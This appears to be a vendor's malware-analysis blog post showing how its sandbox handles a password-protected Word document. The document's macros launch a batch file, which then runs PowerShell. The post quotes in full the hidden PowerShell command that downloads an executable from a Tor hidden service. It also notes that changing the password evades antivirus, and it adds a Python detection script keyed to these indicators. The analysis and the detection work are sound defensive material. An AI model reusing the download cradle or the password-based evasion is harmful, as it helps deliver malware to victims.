Password Protected Word Document Connects to TOR Hidden Service
Password protected documents are an effective method for malware to bypass anti-virus (AV) and other detection solutions. Typically the AV cannot extract the required password from the text of the email that carries the malicious document. With VMRay Analyzer, it has always been possible to manually interact with malware using browser based VNC access. By disabling automatic interaction, users can manually enter the password while interacting with the malware.
In VMRay Analyzer v2.1, we’ve completely automated this process. Users can now provide a password at the time of submission, and the password will be entered during the behavioral analysis (Figure 1). This added functionality removes the manual step, saving DFIR Specialists and Malware Analysts valuable time.
We recently found a sample (thanks to Michael Gillespie) to demonstrate the enhanced automated analysis of password protected documents in VMRay Analyzer v2.1.
The password is only mentioned in the email (“See attachment […]. Password is 5558.”). So if you only have access to the attachment, you won’t be able to analyze it properly. This is also why this attack technique is great at staying undetected – just changing the password produces a different document. VirusTotal scores 0 / 56 (Figure 2); in other words, no AV detected it as malicious.
With VMRay Analyzer v2.1, we are able to take the password found within the body of the e-mail and enter it before analysis. After the analysis is done, we can see that the malware author tries to trick the user into believing the “Can’t View” message comes from Microsoft Word, so that the user will allow macros to run.
Our simulated user interaction is, of course, the best case scenario in every attacker’s eyes (and the worst case scenario for every sysadmin): VMRay Analyzer will do whatever is asked of it – like open the document and let macros run.
Let’s look at the spawned processes after a user enables macros to get a feel of what this malware does (Figure 4):
The macros start a batch file which then starts PowerShell to download and execute the actual payload:
powershell.exe -w hidden "(New-Object System.Net.WebClient).DownloadFile('hxxp://fbbkvm7ezghq4dx3.onion.link/msbus24.exe','C:\Users\HJRD1K~1\AppData\Local\Temp\msbus24.exe')"
Interestingly, this connects to a TOR hidden service, which is often seen in ransomware – of course, this behavior is a huge red flag, because there is basically no legitimate reason to hide an executable file behind TOR. This behavior is marked as malicious in the ‘Detected Threats’ section of the Analysis Report (Figure 5).
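As an added illustration (not part of VMRay's report or product), the following Python script applies the indicators from this chain to constructed process-creation records: a shell spawned by an Office application, a hidden PowerShell window, a WebClient download cradle and a .onion host reached through a Tor2web-style gateway such as onion.link. The batch file name "run.bat" is an assumption; the report does not name it.

```python
import re

# Constructed sample process-creation records (not real telemetry) for the chain
# described above: Word -> batch file -> PowerShell. The URL and %TEMP% path are
# the ones quoted in the report; the batch file name "run.bat" is a placeholder.
SAMPLE_EVENTS = [
    {"parent": "WINWORD.EXE", "image": "cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\HJRD1K~1\AppData\Local\Temp\run.bat"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden \"(New-Object System.Net.WebClient)."
                "DownloadFile('hxxp://fbbkvm7ezghq4dx3.onion.link/msbus24.exe',"
                "'C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\msbus24.exe')\""},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"(?:hxxps?|https?)://[^\s'\"]+", re.I)
# .onion host (16-char v2 or 56-char v3), optionally behind a gateway suffix like .onion.link
ONION_RE = re.compile(r"[a-z2-7]{16,56}\.onion(?:\.[a-z]+)?(?=[/:'\"\s]|$)", re.I)
HIDDEN_RE = re.compile(r"-w\w*\s+hidden", re.I)          # -w / -window / -windowstyle hidden
CRADLE_RE = re.compile(r"Net\.WebClient.*?Download(?:File|String)", re.I | re.S)

def analyze_event(ev):
    """Return the list of reasons this process-creation record looks like the
    document -> shell -> Tor download chain; an empty list means no finding."""
    reasons = []
    cmd = ev["cmdline"]
    if ev["parent"].lower() in OFFICE_APPS and ev["image"].lower() in SHELLS:
        reasons.append(f"{ev['image']} spawned by Office application {ev['parent']}")
    if ev["image"].lower() == "powershell.exe":
        if HIDDEN_RE.search(cmd):
            reasons.append("PowerShell started with a hidden window")
        if CRADLE_RE.search(cmd):
            reasons.append("WebClient download cradle")
    for url in URL_RE.findall(cmd):
        if ONION_RE.search(url):
            reasons.append(f"download from Tor hidden service: {url}")
    return reasons

def find_suspicious(events):
    """Map each flagged command line to its reasons, skipping clean events."""
    return {ev["cmdline"]: r for ev in events if (r := analyze_event(ev))}

if __name__ == "__main__":
    for cmdline, reasons in find_suspicious(SAMPLE_EVENTS).items():
        print(cmdline, "\n  - " + "\n  - ".join(reasons))
```

Run over real process-creation telemetry, the Office-parent and onion-host checks are the ones with the lowest false-positive rate; the hidden-window and cradle checks also fire on some legitimate administration scripts and are best used to raise a score rather than alert on their own.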
As demonstrated with this analysis, the added support for automated password protected document analysis in VMRay Analyzer v2.1 gives DFIR Specialists and CERTs another tool in their arsenal to facilitate and automate the fight against malware.
View the Full Password Protected Word Document Analysis